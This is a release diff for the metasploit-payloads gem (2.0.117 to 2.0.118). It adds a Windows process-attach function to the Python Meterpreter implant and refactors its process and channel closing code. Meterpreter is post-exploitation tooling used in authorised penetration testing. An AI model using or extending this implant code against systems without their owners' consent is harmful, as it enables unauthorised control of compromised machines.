metasploit-payloads 2.0.117 → 2.0.118

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 05c0688e00a3feee84019a39f18e4266fdabf52306270814126790b4696b9d99
-  data.tar.gz: c8ce328d12b7362b16bceac80da589ea8ad5f49dbfb36bd7398556cae8131787
+  metadata.gz: 55f62a6ddb8ad54b97366b04f5b95e70859d702e29e461c3cf860c7958b61ec5
+  data.tar.gz: e72be5a99ca78cd07501b9d9cc3f61bd285da2f818e2c4bc23d8fc9ba524fb90
 SHA512:
-  metadata.gz: ffd922676e0fe215e3092cce6ac98846a9321f4f0d622e12989d3df18e16b701dd82724a732398f208c8f5cc097fee200fc4a4749c49d825443b6d6c4de7604d
-  data.tar.gz: e648692fcc8d4d2e3c9b13dfa790c601dc0bd81556e404ed5fc5783b256d55eb0c4838ceecfee649bec1d8d548b242f8bc93df973cf657add29cf82d55367a22
+  metadata.gz: c91365effac6f9f697441f8356f273f403eb92973e3dd8ecb187d4419299a377e12353cfd6708799ced35fe1839faec70586a9131c61f0e7dbcb01a6d5bfb94d
+  data.tar.gz: 47a8af6283b7dc2e668278548580642b94c8808b5df062c5a7cc51f3663f012fd767a86af8e9bbe7ae23bc9c107ed8cc1799c640593c38e42235dad5ca076eda

data/data/meterpreter/ext_server_stdapi.py

@@ -1336,6 +1336,28 @@ def stdapi_sys_config_sysinfo(request, response):
     response += tlv_pack(TLV_TYPE_ARCHITECTURE, get_system_arch())
     return ERROR_SUCCESS, response
 
+@register_function_if(has_windll)
+def stdapi_sys_process_attach(request, response):
+    pid = packet_get_tlv(request, TLV_TYPE_PID)['value']
+    if not pid:
+        GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
+        GetCurrentProcess.restype = ctypes.c_void_p
+        handle = GetCurrentProcess()
+    else:
+        inherit = packet_get_tlv(request, TLV_TYPE_INHERIT)['value']
+        permissions = packet_get_tlv(request, TLV_TYPE_PROCESS_PERMS)['value']
+
+        OpenProcess = ctypes.windll.kernel32.OpenProcess
+        OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_bool, ctypes.c_uint32]
+        OpenProcess.restype = ctypes.c_void_p
+        handle = OpenProcess(permissions, inherit, pid)
+    if not handle:
+        return error_result_windows(), response
+    meterpreter.processes[handle] = None
+    debug_print('[*] added process id: ' + str(pid) + ', handle: ' + str(handle))
+    response += tlv_pack(TLV_TYPE_HANDLE, handle)
+    return ERROR_SUCCESS, response
+
 @register_function
 def stdapi_sys_process_close(request, response):
     proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)['value']

data/data/meterpreter/meterpreter.py

@@ -1259,6 +1259,21 @@ class PythonMeterpreter(object):
         self.next_channel_id += 1
         return idx
 
+    def close_channel(self, channel_id):
+        if channel_id not in self.channels:
+            return False
+        channel = self.channels[channel_id]
+        try:
+            channel.close()
+        except Exception:
+            debug_traceback('[-] failed to close channel id: ' + str(channel_id))
+            return False
+        del self.channels[channel_id]
+        if channel_id in self.interact_channels:
+            self.interact_channels.remove(channel_id)
+        debug_print('[*] closed and removed channel id: ' + str(channel_id))
+        return True
+
     def add_process(self, process):
         if has_windll:
             PROCESS_ALL_ACCESS = 0x1fffff
@@ -1274,37 +1289,24 @@ class PythonMeterpreter(object):
         return handle
 
     def close_process(self, proc_h_id):
-        proc_h = self.processes.pop(proc_h_id, None)
-        if not proc_h:
+        if proc_h_id not in self.processes:
             return False
-        for channel_id, channel in self.channels.items():
-            if not isinstance(channel, MeterpreterProcess):
-                continue
-            if not channel.proc_h is proc_h:
-                continue
-            self.close_channel(channel_id)
-            break
+        proc_h = self.processes.pop(proc_h_id)
+        if proc_h:
+            # proc_h is only set when we started the process via execute and not when we attached to it
+            for channel_id, channel in self.channels.items():
+                if not isinstance(channel, MeterpreterProcess):
+                    continue
+                if not channel.proc_h is proc_h:
+                    continue
+                self.close_channel(channel_id)
+                break
         if has_windll:
             CloseHandle = ctypes.windll.kernel32.CloseHandle
             CloseHandle.argtypes = [ctypes.c_void_p]
             CloseHandle.restype = ctypes.c_long
             CloseHandle(proc_h_id)
-        debug_print('[*] closed and removed process id: ' + str(proc_h.pid) + ', handle: ' + str(proc_h_id))
-        return True
-
-    def close_channel(self, channel_id):
-        if channel_id not in self.channels:
-            return False
-        channel = self.channels[channel_id]
-        try:
-            channel.close()
-        except Exception:
-            debug_traceback('[-] failed to close channel id: ' + str(channel_id))
-            return False
-        del self.channels[channel_id]
-        if channel_id in self.interact_channels:
-            self.interact_channels.remove(channel_id)
-        debug_print('[*] closed and removed channel id: ' + str(channel_id))
+        debug_print('[*] closed and removed process handle: ' + str(proc_h_id))
         return True
 
     def get_packet(self):

data/lib/metasploit-payloads/version.rb

@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-  VERSION = '2.0.117'
+  VERSION = '2.0.118'
 
   def self.version
     VERSION

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-  version: 2.0.117
+  version: 2.0.118
 platform: ruby
 authors:
 - OJ Reeves